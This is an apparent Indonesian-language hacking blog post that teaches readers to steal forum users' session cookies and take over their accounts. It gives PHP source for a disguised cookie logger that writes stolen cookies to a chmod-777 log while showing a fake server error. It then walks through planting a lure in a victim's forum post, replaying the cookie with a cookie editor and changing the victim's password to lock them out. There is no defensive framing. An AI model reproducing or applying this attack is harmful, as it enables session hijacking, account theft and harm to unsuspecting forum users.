Rezky
Cookie adalah tempat untuk menyimpan semua informasi yang diperlukan tentang satu Akun, dengan menggunakan informasi ini, kamu bisa nge-hack Akun orang lain dan mengubah password mereka. Jika Kamu telah mendapatkan Cookie dari Korban, Kamu bisa Hack Akun apapun dari Korban. Misalnya Google, Yahoo, Orkut, Facebook, Flickr dll
Sedangkan CookieLogger sendiri adalah Script yang Digunakan untuk Mencuri Cookie dan menyimpannya ke dalam sebuah file log yang mana bisa Kamu gunakan untuk membaca Cookies dari Korban.
Langkah 1
Download File ini lalu simpan sebagai fun.gif
Langkah 2
Copy Script berikut ke Notepad dan simpan sebagai cookielogger.php
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Langkah 3
Buat File Notepad baru dan simpan sebagai logfile.txt
Langkah 4
Upload File-file tadi ke Server kamu
cookielogger.php ===> http://www.situskamu.com/cookielogger.php
logfile.txt =========> http://www.siruskamu.com/logfile.txt (chmod 777)
fun.gif ===========> http://www.situskamu.com/fun.gif
Jika Kamu tidak punya website, Kamu boleh menggunakan 0fees.net untuk mendapatkan website gratis yang mendukung php.
Langkah 5
Pergi ke forum si korban dan masukkan kode ini pada Signature atau Posting
Langkah 6
Ketika korban melihat post, ia akan melihat gambar yang telah kamu upload. ketika korban men-klik gambar tersebut, akan terjadi Temporary Error dan kamu akan mendapatkan cookie di log.txt.
Cookie akan terlihat seperti ini:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22 %22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Langkah 7
Untuk mendapatkan akses ke Akun Korban, Kamu harus mengganti cookie dengan Cookie Korban. Gunakan Cookie Editor untuk ini. String sebelum "=" adalah nama dari cookie tersebut dan string setelah "=" adalah nilainya. Ubah Nilainya (value) pada cookie di cookie Editor.
Langkah 8
Ke Website yang Account-nya baru saja Kamu hack dan Kamu akan login sebagai Korban tadi dan lalu Kamu bisa mengubah informasi Akun korban.
Catatan:
Dari Langkah 6-8, Pastikan Korban sedang Online, karena yang kamu bajak adalah Sesi Korban. Jadi jika dia mengklik "Logout" maka Kamu juga akan secara otomatis "Logout".
Namun jika kamu dengan cepat mengubah password-nya, maka kamu bisa login sesukamu dan si Korban tidak akan bisa login lagi di Akun-nya.
Posted in: Hack
0 Comments:
Posting Komentar